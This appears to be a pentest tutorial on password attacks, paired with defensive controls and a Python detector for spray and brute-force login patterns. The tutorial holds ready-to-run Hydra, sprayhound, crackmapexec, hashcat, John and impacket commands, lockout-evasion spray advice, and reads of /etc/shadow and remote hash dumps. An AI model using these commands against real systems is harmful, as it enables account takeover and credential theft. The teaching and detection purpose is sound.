Advanced Pentest & Offensive
Password attacks — brute force, hash cracking (hashcat), password spray
Weak passwords remain the most common entry vector. Understanding how password attacks work enables building effective policies and controls.
Attack types
Brute force: test every possible combination (slow, but guaranteed to succeed eventually)
Dictionary: test words from a wordlist (fast, covers common cases)
Rule-based: apply transformations to the wordlist (password → P@ssw0rd)
Password spray: one weak password against many users (stays below the per-account lockout threshold)
Credential stuffing: use user:password pairs from previous breaches
Hash cracking: crack hashes offline (no target rate limit or lockout)
Essential wordlists
# RockYou — 14 million real passwords from a breach
/usr/share/wordlists/rockyou.txt
# SecLists — comprehensive collection
/usr/share/seclists/Passwords/
/usr/share/seclists/Usernames/
# Generate custom wordlist with cewl (terms from target site)
cewl https://example.com -m 5 -d 2 -w custom_wordlist.txt
Hydra — online brute force
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.10 http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid credentials"
# FTP with user list
hydra -L users.txt -P passwords.txt ftp://192.168.1.10
# RDP
hydra -l administrator -P passwords.txt rdp://192.168.1.10 -t 4
# Limit threads to avoid lockout
hydra -l admin -P passwords.txt ssh://192.168.1.10 -t 2 -W 3
Password Spray — avoiding account lockout
Strategy: one password at a time, tried against every user, so each account sees a single failure and stays under the lockout threshold (e.g., 5 failed attempts → block).
# Spray against Active Directory over LDAP (sprayhound)
sprayhound -U users.txt -p "Winter2024!" --dc 192.168.1.10
# Spray against SMB/Active Directory
crackmapexec smb 192.168.1.10 -u users.txt -p "Password@2024" --continue-on-success
# Common passwords for spray:
Season+Year: Spring2024, Summer2024, Winter2024
Company+123: ExampleCorp123, Example@1
Common default: Welcome1, Password1, Changeme1
Hashcat — offline hash cracking
# Identify hash type
hashid '$2y$10$...' # bcrypt
hashid '5f4dcc3b5aa765d61d8327deb882cf99' # MD5
# Common hashcat modes (-m):
0 = MD5
100 = SHA-1
1000 = NTLM (Windows)
1800 = sha512crypt (Linux /etc/shadow)
3200 = bcrypt
13100 = Kerberoast (TGS-REP)
# Dictionary attack
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
# Rule-based attack (best cost/benefit ratio)
hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Brute force by mask (8 chars: 4 lowercase letters followed by 4 digits)
hashcat -m 1000 hashes.txt -a 3 ?l?l?l?l?d?d?d?d
# Mask characters:
?l = lowercase (a-z)
?u = uppercase (A-Z)
?d = digit (0-9)
?s = special characters
?a = all of the above
Obtaining hashes for cracking
# Windows — local dump (requires admin/SYSTEM)
# Meterpreter: hashdump
# Impacket (remote, admin credentials):
impacket-secretsdump administrator:password@192.168.1.10
# Linux — shadow file (requires root)
cat /etc/shadow
root:$6$salt$hash...:18000:0:99999:7:::
# Kerberoasting — SPNs in Active Directory
impacket-GetUserSPNs -dc-ip 192.168.1.10 example.local/user:password \
-outputfile kerb_hashes.txt
hashcat -m 13100 kerb_hashes.txt rockyou.txt
John the Ripper — alternative to hashcat
# Simple cracking
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# With specific format
john --format=NT hashes.txt --wordlist=rockyou.txt
# Combine /etc/passwd and /etc/shadow
unshadow /etc/passwd /etc/shadow > combined.txt
john combined.txt --wordlist=rockyou.txt
Defense against password attacks
Against online brute force:
→ Account lockout after N attempts
→ Rate limiting per IP
→ Mandatory MFA
→ CAPTCHA on public forms
→ Monitor failed attempts in SIEM
Against password spray:
→ Alert when same IP tries multiple users
→ Strong password policy (min 12 chars, complexity)
→ Smart lockout (Azure AD, Okta)
Against hash cracking:
→ Use bcrypt, Argon2, or scrypt — never MD5 or SHA-1 for passwords
→ Unique salt per user
→ Server-side pepper (additional secret)
Strong passwords plus MFA eliminate most of these vectors. Defense starts in policy, not detection.
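The "alert when the same IP tries multiple users" control from the spray defenses, as an added example that is not part of the original page: it parses constructed sshd-style failure lines, flags a source as a spray when it fails against several distinct users inside one sliding window and as brute force when it hammers one account, and shows why a per-account lockout counter alone misses the spray described in the Password Spray section. The log format, the 5-minute window and the thresholds are assumptions, not a real SIEM rule.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta
# Constructed sshd-style sample (not from a real host): one source sprays five users, one hammers alice.
SAMPLE_LOG = """\
2024-01-15T09:00:01 sshd[101]: Failed password for alice from 203.0.113.5 port 50001 ssh2
2024-01-15T09:00:03 sshd[102]: Failed password for bob from 203.0.113.5 port 50002 ssh2
2024-01-15T09:00:04 sshd[103]: Failed password for carol from 203.0.113.5 port 50003 ssh2
2024-01-15T09:00:06 sshd[104]: Failed password for invalid user dave from 203.0.113.5 port 50004 ssh2
2024-01-15T09:00:07 sshd[105]: Failed password for erin from 203.0.113.5 port 50005 ssh2
2024-01-15T09:00:09 sshd[106]: Failed password for alice from 198.51.100.7 port 40001 ssh2
2024-01-15T09:00:10 sshd[107]: Failed password for alice from 198.51.100.7 port 40002 ssh2
2024-01-15T09:00:12 sshd[108]: Failed password for alice from 198.51.100.7 port 40003 ssh2
2024-01-15T09:00:13 sshd[109]: Failed password for alice from 198.51.100.7 port 40004 ssh2
2024-01-15T09:00:15 sshd[110]: Failed password for alice from 198.51.100.7 port 40005 ssh2
2024-01-15T09:05:00 sshd[112]: Accepted password for bob from 192.0.2.9 port 30001 ssh2
"""
FAILED_RE = re.compile(r"^(?P<ts>\S+) sshd\[\d+\]: Failed password for (?:invalid user )?"
                       r"(?P<user>\S+) from (?P<ip>\S+) port")

def parse_failures(log_text):
    """Return (timestamp, user, source_ip) for each failed-password line; other lines are skipped."""
    hits = (FAILED_RE.match(line) for line in log_text.splitlines())
    return [(datetime.fromisoformat(m["ts"]), m["user"], m["ip"]) for m in hits if m]

def classify_sources(log_text, window=timedelta(minutes=5), spray_users=5, brute_attempts=5):
    """Map source IP -> 'spray', 'brute_force' or 'both' when any sliding window crosses a threshold."""
    by_ip = defaultdict(list)
    for ts, user, ip in sorted(parse_failures(log_text)):
        by_ip[ip].append((ts, user))
    verdicts = {}
    for ip, attempts in by_ip.items():
        recent, flags = deque(), set()
        for ts, user in attempts:
            recent.append((ts, user))
            while ts - recent[0][0] > window:  # drop attempts older than the window
                recent.popleft()
            per_user = Counter(u for _, u in recent)
            if len(per_user) >= spray_users:  # one source, many users: spray pattern
                flags.add("spray")
            if max(per_user.values()) >= brute_attempts:  # one user hammered: brute force
                flags.add("brute_force")
        if flags:
            verdicts[ip] = "both" if len(flags) == 2 else flags.pop()
    return verdicts

def accounts_over_lockout(log_text, threshold=5):
    """Users a per-account lockout would trip on; each sprayed user shows one failure and stays below."""
    counts = Counter(user for _, user, _ in parse_failures(log_text))
    return {user for user, n in counts.items() if n >= threshold}
```

On the sample, classify_sources flags 203.0.113.5 as a spray and 198.51.100.7 as brute force, while accounts_over_lockout returns only alice: the five sprayed accounts never reach the lockout counter.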